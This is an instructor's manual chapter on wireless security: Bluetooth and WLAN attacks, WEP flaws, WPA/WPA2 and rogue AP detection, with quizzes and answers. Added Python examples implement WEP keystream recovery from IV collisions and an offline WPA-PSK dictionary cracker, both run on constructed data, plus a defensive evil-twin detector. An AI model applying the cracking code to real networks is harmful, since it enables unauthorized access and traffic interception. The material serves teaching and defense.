Security+ Guide to Network Security Fundamentals, Fourth Edition
Chapter 8
Wireless Network Security
At a Glance
Instructor’s Manual Table of Contents

 Overview
 Objectives
 Teaching Tips
 Quick Quizzes
 Class Discussion Topics
 Additional Projects
 Additional Resources
 Key Terms
Lecture Notes
Overview
Wireless is convenient and, in today's networks, it is quickly becoming the standard
connection for many people. There are drawbacks to wireless, especially since the
security of these networks has evolved very slowly. The chapter discusses the
vulnerabilities of the common wireless protocols and appropriate techniques for
properly securing wireless networks.
Chapter Objectives
 Describe the different types of wireless network attacks
 List the vulnerabilities in IEEE 802.11 security
 Explain the solutions for securing a wireless network
Teaching Tips
Wireless Attacks
1. Note that several attacks can be directed against wireless data systems.
2. Explain that these attacks can be directed against Bluetooth systems and wireless local
area networks.
Attacks on Bluetooth Devices
1. Define Bluetooth, which is the name given to a wireless technology that uses short-range radio frequency (RF) transmissions and provides for rapid ad hoc device pairings.
2. Explain that Bluetooth technology enables users to connect wirelessly to a wide range
of computing and telecommunications devices.
3. Emphasize that it provides for rapid “on the fly” ad hoc connections between a
Bluetooth-enabled device such as a cellular smartphone or a laptop computer and a set
of Bluetooth headphones or a mouse.
4. Refer to Table 8-1 to discuss different types of Bluetooth products.
5. Note that Bluetooth is a Personal Area Network (PAN) technology designed for data
communication over short distances.
6. Discuss the two types of Bluetooth network topologies: piconets and scatternets.
7. Explain that bluejacking is an attack that sends unsolicited messages to Bluetooth-enabled devices.
8. Note that bluesnarfing is an attack that accesses unauthorized information from a
wireless device through a Bluetooth connection, often between cell phones and laptop
computers.
Wireless LAN Attacks
1. Discuss the evolution of the IEEE wireless networking standards.
2. Explain that a wireless client network interface card adapter performs the same
functions as a wired adapter with one major exception: there is no external cable RJ-45
connection.
3. Discuss the three parts of an access point (AP):
a. An antenna and a radio transmitter/receiver to send and receive wireless signals
b. Special bridging software to interface wireless devices to other devices
c. A wired network interface that allows it to connect by cable to a standard wired
network
4. Discuss the basic functions of an AP.
5. Explain the purpose of war driving and war chalking.
6. Discuss the attacks that can be mounted through the RF spectrum.
7. Mention the attacks that use access points:
a. Rogue access point
b. Evil twin
Teaching Tip: Explain that Bluetooth hacking is highly scripted and a routine source of
entertainment for those attending “security” conferences.
Vulnerabilities of IEEE 802.11 Security
1. Mention that the primary vulnerabilities are in the areas of open system authentication,
MAC address filtering, SSID broadcast, and WEP.
MAC Address Filtering
1. Explain that MAC addresses are carried unencrypted in the header of every 802.11
frame; WEP and WPA encrypt only the frame body, never the addresses. An attacker can
therefore sniff the MAC address of an approved device, set it on his or her own adapter,
and join the network, so MAC filtering stops only casual, non-malicious connections.
2. Mention that managing a large number of MAC addresses can pose significant
challenges.
3. Explain that MAC address filtering does not provide a means to temporarily allow a
guest user to access the network other than manually entering the user’s MAC address
into the access point.
SSID Broadcast
1. Remind students that in a wireless network, each device must be authenticated prior to
being connected to the WLAN (once the wireless device is authenticated, the user may
then be asked to authenticate by entering a username and password).
2. Discuss the practice of disabling SSID broadcast to hide the wireless network, and its
limitation: the SSID still appears in the clear in probe and association frames, so a
passive sniffer learns it as soon as a legitimate client connects. Hiding the SSID is not
a substitute for encryption.
Wired Equivalent Privacy (WEP)
1. Note that Wired Equivalent Privacy (WEP) is an IEEE 802.11 security protocol
designed to ensure that only authorized parties can view transmitted wireless
information.
2. Explain that to encrypt packets WEP can use only a 64-bit or 128-bit number, which is
made up of a 24-bit initialization vector (IV) and a 40-bit or 104-bit default key. The
relatively short length of the default key limits its strength.
3. Mention that the WEP implementation violates the cardinal rule of cryptography: anything
that creates a detectable pattern must be avoided at all costs. The 24-bit IV allows only
2^24 (about 16.7 million) distinct values, so a busy AP that assigns IVs sequentially
starts repeating them in fewer than seven hours, and an AP that picks IVs at random is
expected to repeat one after only about 5,000 frames.
4. Because of this weakness, an attacker can identify two packets encrypted under the same
IV (called a collision). Both packets were encrypted with the same RC4 keystream, so
XORing the two ciphertexts cancels the keystream and yields the XOR of the two
plaintexts; any known plaintext (such as the predictable LLC/SNAP header at the start
of a data frame) then reveals the keystream itself.
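The following is an added worked example, not code from the textbook, showing the WEP IV collision and keystream attack described above. It implements RC4 and the WEP framing (IV || RC4(IV || key, plaintext || CRC-32 ICV)); the 40-bit key, the IV, and the two frame payloads are constructed for the demo, and the only "known plaintext" the attacker relies on is the LLC/SNAP header that real 802.11 data frames begin with.

```python
"""Added example, not code from the textbook: why a repeated WEP IV is fatal.

WEP seeds RC4 with IV || default key, so two frames sent under the same IV
share one keystream. XOR-ing their ciphertexts cancels the keystream and
leaves plaintext1 XOR plaintext2; any known plaintext then yields the
keystream itself. The key, IV and frame payloads below are constructed.
"""
import math
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling plus keystream generation; WEP's stream cipher."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP body: IV in the clear || RC4(IV || key, plaintext || CRC-32 ICV)."""
    assert len(iv) == 3 and len(key) in (5, 13)  # 24-bit IV, 40- or 104-bit key
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + rc4(iv + key, plaintext + icv)


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Legitimate receiver: strip the IV, decrypt, verify the ICV."""
    iv, body = frame[:3], frame[3:]
    data = rc4(iv + key, body)
    plaintext, icv = data[:-4], data[-4:]
    if struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF) != icv:
        raise ValueError("ICV mismatch")
    return plaintext


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def same_iv(frame1: bytes, frame2: bytes) -> bool:
    """The IV is sent in the clear, so pairing same-IV frames is trivial for a sniffer."""
    return frame1[:3] == frame2[:3]


def recover_with_known_plaintext(frame1: bytes, known_p1: bytes, frame2: bytes) -> bytes:
    """keystream = C1 XOR P1; then P2 = C2 XOR keystream (over the known length)."""
    keystream = xor(frame1[3:3 + len(known_p1)], known_p1)
    return xor(frame2[3:3 + len(keystream)], keystream)


def hours_to_iv_exhaustion(frames_per_second: float, iv_bits: int = 24) -> float:
    """Sequential IVs: a busy AP wraps the 24-bit counter in under 7 hours at ~700 frames/s."""
    return (2 ** iv_bits) / frames_per_second / 3600


def expected_frames_to_first_collision(iv_bits: int = 24) -> float:
    """Random IVs: birthday bound, about sqrt(pi/2 * 2^n) frames (~5,100 for n = 24)."""
    return math.sqrt(math.pi / 2 * 2 ** iv_bits)


# Constructed sample traffic. Real 802.11 data frames start with the LLC/SNAP
# header AA AA 03 00 00 00 plus the EtherType (08 00 for IPv4): predictable
# plaintext that gives an attacker the first eight keystream bytes for free.
LLC_SNAP_IPV4 = bytes.fromhex("aaaa030000000800")
KEY40 = bytes.fromhex("0102030405")   # constructed 40-bit default key
IV = bytes.fromhex("c0ffee")          # constructed IV that the AP reuses
P1 = LLC_SNAP_IPV4 + b"GET /login HTTP/1.1"
P2 = LLC_SNAP_IPV4 + b"password=hunter2"
FRAME1 = wep_encrypt(KEY40, IV, P1)
FRAME2 = wep_encrypt(KEY40, IV, P2)

if __name__ == "__main__":
    assert same_iv(FRAME1, FRAME2)
    print("C1 xor C2 == P1 xor P2:", xor(FRAME1[3:], FRAME2[3:])[:len(P2)] == xor(P1, P2))
    print("keystream from header  :", recover_with_known_plaintext(FRAME1, LLC_SNAP_IPV4, FRAME2))
    print("frame 2 from known P1  :", recover_with_known_plaintext(FRAME1, P1, FRAME2)[:len(P2)])
    print("hours to IV wrap @700/s:", round(hours_to_iv_exhaustion(700), 2))
```

The attacker never touches the key: once two frames share an IV, the eight-byte LLC/SNAP header alone gives eight keystream bytes, and any longer known plaintext (for example a frame the attacker caused the victim to send) exposes the whole of the other frame. The two arithmetic helpers make the "fewer than seven hours" figure concrete and show that random IV selection does not help, because the birthday bound on a 24-bit space is only a few thousand frames.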
Teaching Tip: Because of its significant security vulnerabilities, WEP should not be
used.
Quick Quiz 1
1. ____ is the name given to a wireless technology that uses short-range radio frequency
(RF) transmissions and provides for rapid ad hoc device pairings.
Answer: Bluetooth
2. ____ is an attack that sends unsolicited messages to Bluetooth-enabled devices.
Answer: Bluejacking
3. True or False: Open system authentication is weak because authentication is based on
only one factor: a match of SSIDs.
Answer: True
Wireless Security Solutions
1. The wireless security requirements for personal wireless security are most often based
on two models promoted by the Wi-Fi Alliance: WPA Personal Security and WPA2
Personal Security.
Wi-Fi Protected Access (WPA)
1. Explain that the design goal of WPA was to protect both present and future wireless
devices.
2. Note that WPA is a subset of 802.11i and addresses both encryption and authentication.
3. Explain that WPA replaces WEP with an encryption technology called Temporal Key
Integrity Protocol (TKIP).
4. Discuss the advantages of TKIP over WEP.
5. Explain that WPA authentication can be accomplished by using either IEEE 802.1X or
preshared key (PSK) technology.
6. Discuss the vulnerabilities that can result from improper management of the PSK,
including key management weaknesses (one key shared by every user and device, and
changed only by reconfiguring all of them) and the use of weak passphrases, which can
be guessed offline once an attacker has captured a single client handshake.
Wi-Fi Protected Access 2 (WPA2)
1. Define Wi-Fi Protected Access 2 (WPA2) as the second generation of WPA security,
introduced by the Wi-Fi Alliance in September 2004. WPA2 still uses PSK or 802.1X
authentication, but instead of TKIP encryption it uses AES-CCMP.
2. Explain that encryption under the WPA2 personal security model is accomplished by
AES-CCMP. CCMP is based upon the Counter Mode with CBC-MAC (CCM) of the
Advanced Encryption Standard (AES) encryption algorithm.
3. Mention that within CCM the counter (CTR) mode component provides data
confidentiality, while the Cipher Block Chaining Message Authentication Code
(CBC-MAC) component provides data integrity and authentication.
4. Note that WPA2 authentication is accomplished through PSK or by the IEEE 802.1X
standard.
5. Discuss the two common EAP protocols:
a. Lightweight EAP (LEAP), proprietary to Cisco and no longer recommended because its
password-based exchange can be attacked offline with a dictionary
b. Protected EAP (PEAP), which carries the inner authentication inside a TLS tunnel
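The following is an added worked example, not code from the textbook, covering the PSK weaknesses raised under both WPA (item 6 above) and WPA2 (item 4 above). It implements the published WPA/WPA2-Personal derivations (PBKDF2-HMAC-SHA1 for the PMK, the 802.11i PRF for the PTK, HMAC-SHA1 for the EAPOL-Key MIC) and then shows that, given one captured handshake, a weak passphrase is recovered offline with nothing but a wordlist. The SSID, MAC addresses, nonces and EAPOL-Key body are constructed for the demo and are not a real capture.

```python
"""Added example, not code from the textbook: WPA/WPA2-Personal key derivation
and why the model is only as strong as the passphrase.

derive_pmk, prf and derive_ptk follow the published 802.11i derivations; the
MAC addresses, nonces and EAPOL-Key body below are constructed for the demo
(not a real capture, and EAPOL_M2 is not a byte-exact frame).
"""
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK = PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The SSID is public, so anyone can precompute PMKs for a wordlist."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces)).
    For CCMP the 48 bytes are KCK (16) || KEK (16) || TK (16)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_body: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, body with MIC zeroed)[:16]."""
    return hmac.new(kck, eapol_body, hashlib.sha1).digest()[:16]


def handshake_mic(passphrase, ssid, aa, spa, anonce, snonce, eapol_body) -> bytes:
    """What the supplicant computes for message 2 of the 4-way handshake."""
    ptk = derive_ptk(derive_pmk(passphrase, ssid), aa, spa, anonce, snonce)
    return eapol_mic(ptk[:16], eapol_body)


def crack_psk(wordlist, ssid, aa, spa, anonce, snonce, eapol_body, captured_mic):
    """Offline dictionary attack: every input except the passphrase was sent in the clear."""
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:  # WPA passphrase length bounds
            continue
        guess = handshake_mic(candidate, ssid, aa, spa, anonce, snonce, eapol_body)
        if hmac.compare_digest(guess, captured_mic):
            return candidate
    return None


# Constructed handshake material (not a capture).
SSID = "CorpNet"
AA = bytes.fromhex("001122334455")    # authenticator (AP) MAC
SPA = bytes.fromhex("66778899aabb")   # supplicant (client) MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_M2 = b"\x02\x03\x00\x5f\x02\x01\x0a" + b"\x00" * 8 + SNONCE + b"\x00" * 16  # MIC zeroed

if __name__ == "__main__":
    real_passphrase = "correct horse battery"
    mic = handshake_mic(real_passphrase, SSID, AA, SPA, ANONCE, SNONCE, EAPOL_M2)  # sniffed
    wordlist = ["letmein!", "Password1", "correct horse battery"]
    print(crack_psk(wordlist, SSID, AA, SPA, ANONCE, SNONCE, EAPOL_M2, mic))
```

Nothing in the exchange is secret except the passphrase: SSID, both MAC addresses, both nonces and the MIC all travel in the clear, so the 4096-iteration PBKDF2 is the only cost the attacker pays per guess. That is why the PSK model is acceptable only with a long, random passphrase, and why 802.1X with per-user credentials is preferred in an enterprise.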
Teaching Tip: It is recommended that AES-CCMP encryption and decryption be performed in
hardware because of its computationally intensive nature. Performing AES-CCMP
encryption in software requires significant processing power. If an AP performed
AES-CCMP encryption/decryption in software while serving several devices, the AP
would not be able to adequately service the devices, especially if that access point
lacked a powerful processor and a large amount of memory.
Other Wireless Security Steps
1. Note that antenna placement, power level controls, and rogue AP discovery tools can be
used to protect a wireless network.
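The following is an added worked example, not code from the textbook, of the kind of check a rogue AP discovery tool performs: compare what the radios actually see against an inventory of authorized BSSIDs and flag unknown APs that advertise the corporate SSID (evil twin candidates) or inventory BSSIDs that appear with the wrong SSID, channel or security (a cloned BSSID). The inventory and scan lines are constructed for the demo; the line format is a simplified version of the BSSID, channel, privacy and ESSID columns in an airodump-ng CSV, not a real capture.

```python
"""Added example, not code from the textbook: a minimal rogue / evil-twin AP
check over wireless scan results. Inventory and scan lines are constructed.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class APRecord:
    bssid: str
    channel: int
    privacy: str  # e.g. "OPN", "WEP", "WPA", "WPA2"
    ssid: str


# Constructed inventory: BSSID -> the configuration the AP is supposed to have.
AUTHORIZED = {
    "00:11:22:33:44:55": APRecord("00:11:22:33:44:55", 6, "WPA2", "CorpNet"),
    "00:11:22:33:44:66": APRecord("00:11:22:33:44:66", 11, "WPA2", "CorpNet"),
}
CORPORATE_SSIDS = {"CorpNet"}

# Constructed scan output: bssid,channel,privacy,essid (simplified airodump-ng style).
SCAN = """\
00:11:22:33:44:55,6,WPA2,CorpNet
00:11:22:33:44:66,11,WPA2,CorpNet
de:ad:be:ef:00:01,6,OPN,CorpNet
de:ad:be:ef:00:02,1,WPA2,CorpNet
aa:bb:cc:dd:ee:ff,3,WPA2,CoffeeShop
00:11:22:33:44:55,6,WEP,CorpNet
"""


def parse_scan(text: str) -> list:
    """Parse the simplified CSV; normalise MACs and privacy strings to upper case."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        bssid, channel, privacy, ssid = (field.strip() for field in line.split(",", 3))
        records.append(APRecord(bssid.upper(), int(channel), privacy.upper(), ssid))
    return records


def classify(records, authorized, corporate_ssids) -> dict:
    """Return {bssid: verdict}.

    authorized     matches the inventory entry exactly
    spoofed-bssid  inventory BSSID seen with a different SSID, channel or security
    evil-twin      unknown BSSID advertising one of our SSIDs
    foreign        unknown BSSID, unrelated SSID (a neighbour, not our problem)
    A BSSID seen both legitimately and spoofed stays flagged.
    """
    verdicts = {}
    for rec in records:
        expected = authorized.get(rec.bssid)
        if expected is not None:
            verdict = "authorized" if rec == expected else "spoofed-bssid"
        elif rec.ssid in corporate_ssids:
            verdict = "evil-twin"
        else:
            verdict = "foreign"
        if verdicts.get(rec.bssid, "authorized") == "authorized":
            verdicts[rec.bssid] = verdict
    return verdicts


def alerts(verdicts: dict) -> list:
    """Just the findings worth paging someone about, sorted for stable output."""
    return sorted((b, v) for b, v in verdicts.items() if v in ("evil-twin", "spoofed-bssid"))


if __name__ == "__main__":
    for bssid, verdict in alerts(classify(parse_scan(SCAN), AUTHORIZED, CORPORATE_SSIDS)):
        print(f"{bssid}  {verdict}")
```

The open "CorpNet" on channel 6 is the classic evil twin: same name as the real AP, no encryption, so a client that auto-joins by SSID hands its traffic to the attacker. The last line shows why the inventory must record more than the BSSID: the attacker has cloned an authorized MAC, and only the mismatch in security (WEP instead of WPA2) gives it away.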
Quick Quiz 2
1. True or False: WPA replaces the Message Integrity Check (MIC) function in WEP with
the Cyclic Redundancy Check (CRC).
Answer: False
2. PSK authentication uses a(n) ____ to generate the encryption key.
Answer: passphrase
3. The AES algorithm processes blocks of ____ bits.
Answer: 128
4. True or False: Wireless VLANs allow a single access point to service different types of
users.
Answer: True
Class Discussion Topics
1. Have students discuss how they would envision the devices that they own working
together and how that might be done in a secure manner.
2. Have students discuss their experiences with Bluetooth hacking or having been hacked
via Bluetooth.
Additional Projects
1. Have students research recent developments from the WiFi Alliance, especially those
related to the simultaneous use of peer-to-peer wireless devices while connected to an
infrastructure mode device.
2. Have students research the debate over WiMax and LTE and the promise of “mobile
broadband.”
Additional Resources
1. IEEE 802.11 Wireless networks
http://ieee802.org/11/
2. Bluetooth
http://www.bluetooth.com/
3. HIPAA and Wireless
http://www.airtightnetworks.com/home/solutions/industry-solutions/healthcare/hipaacompliance-and-wireless.html
4. WiFi Direct vs Bluetooth 4.0
http://www.pcworld.com/article/208778/wifi_direct_vs_bluetooth_40_a_battle_for_supremacy.html
5. WiFi Alliance
http://www.wi-fi.org/
Key Terms
 AES-CCMP The encryption protocol standard for WPA2.
 bluejacking An attack that sends unsolicited messages to Bluetooth-enabled devices.
 bluesnarfing An attack that accesses unauthorized information from a wireless device
through a Bluetooth connection, often between cell phones and laptop computers.
 Bluetooth A wireless technology that uses short-range radio frequency (RF)
transmissions and provides for rapid ad hoc device pairings.
 evil twin An AP set up by an attacker to mimic an authorized AP and capture
transmissions, so a user’s device will unknowingly connect to this evil twin instead.
 Extensible Authentication Protocol (EAP) A framework for transporting
authentication protocols that defines the format of the messages.
 initialization vector (IV) A 24-bit value used in WEP that changes each time a packet
is encrypted.
 keystream attack (IV attack) A method of determining the keystream by analyzing
two packets that were created from the same initialization vector (IV).
 Lightweight EAP (LEAP) A proprietary EAP method developed by Cisco Systems that requires
mutual authentication and is used for WLAN encryption with Cisco client software.
 Media Access Control (MAC) address filtering A method for controlling access to a
WLAN based on the device’s MAC address.
 preshared key (PSK) A key value that must be created and entered into both the access
point and all wireless devices (“shared”) prior to (“pre”) the devices communicating
with the AP.
 Protected EAP (PEAP) An EAP method designed to simplify the deployment of
802.1X by using Microsoft Windows logins and passwords.
 rogue access point An unauthorized AP that allows an attacker to bypass many of the
network security configurations and opens the network and its users to attacks.
 Service Set Identifier (SSID) The user-supplied network name of a WLAN; it can
generally be alphanumeric and up to 32 characters long.
 SSID broadcast The transmission of the SSID from the access point to wireless
devices.
 Temporal Key Integrity Protocol (TKIP) A WPA encryption technology.
 war chalking The process of documenting and then advertising the location of wireless
LANs for others to use. Wireless networks were identified by drawing on sidewalks or
walls around the area of the network.
 war driving Searching for wireless signals from an automobile or on foot using a
portable computing device.
 Wi-Fi Protected Access (WPA) The original set of protections from the Wi-Fi
Alliance in 2003 designed to protect both present and future wireless devices.
 Wi-Fi Protected Access 2 (WPA2) The second generation of WPA security from the
Wi-Fi Alliance in 2004 to address authentication and encryption on WLANs.
 Wired Equivalent Privacy (WEP) An IEEE 802.11 security protocol designed to
ensure that only authorized parties can view transmitted wireless information. WEP has
significant vulnerabilities and is not considered secure.